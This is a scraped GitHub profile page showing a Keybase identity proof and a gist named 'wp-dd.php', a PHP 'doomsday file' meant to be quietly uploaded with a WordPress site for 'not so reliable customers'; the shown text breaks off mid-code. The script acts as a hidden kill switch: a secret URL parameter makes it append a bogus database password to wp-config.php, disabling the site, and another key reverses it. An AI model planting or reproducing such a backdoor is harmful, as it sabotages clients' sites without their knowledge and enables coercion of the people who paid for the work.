Skip to content

Instantly share code, notes, and snippets.

View Kageetai's full-sized avatar

Michael Seifarth Kageetai

View GitHub Profile

Keybase proof

I hereby claim:

  • I am kageetai on github.
  • I am kageetai (https://keybase.io/kageetai) on keybase.
  • I have a public key ASBorwqR69Eef4AjJOf02OGDe9crLQgMvyDszQsg9GZijAo

To claim this, I am signing this object:

@Kageetai
Kageetai / wp-dd.php
Created March 16, 2016 15:39
Small doomsday file to upload with a WordPress installation, just to secure against "not so reliable customers". Just in case!
<?php
$file = "wp-config.php";
$doomsday = "\ndefine('DB_PASSWORD', '12345');\n";
if ($_GET["p"] == "sfvosovwrs4fj04uwor420hg24rv") {
// add doomsday line to disable access to DB
file_put_contents($file, $doomsday, FILE_APPEND | LOCK_EX);
echo "dommed";
} else if ($_GET["p"] == "tzj485hwrjfg24hwrjgwf") {
// load the data and delete the line from the array
$lines = file($file);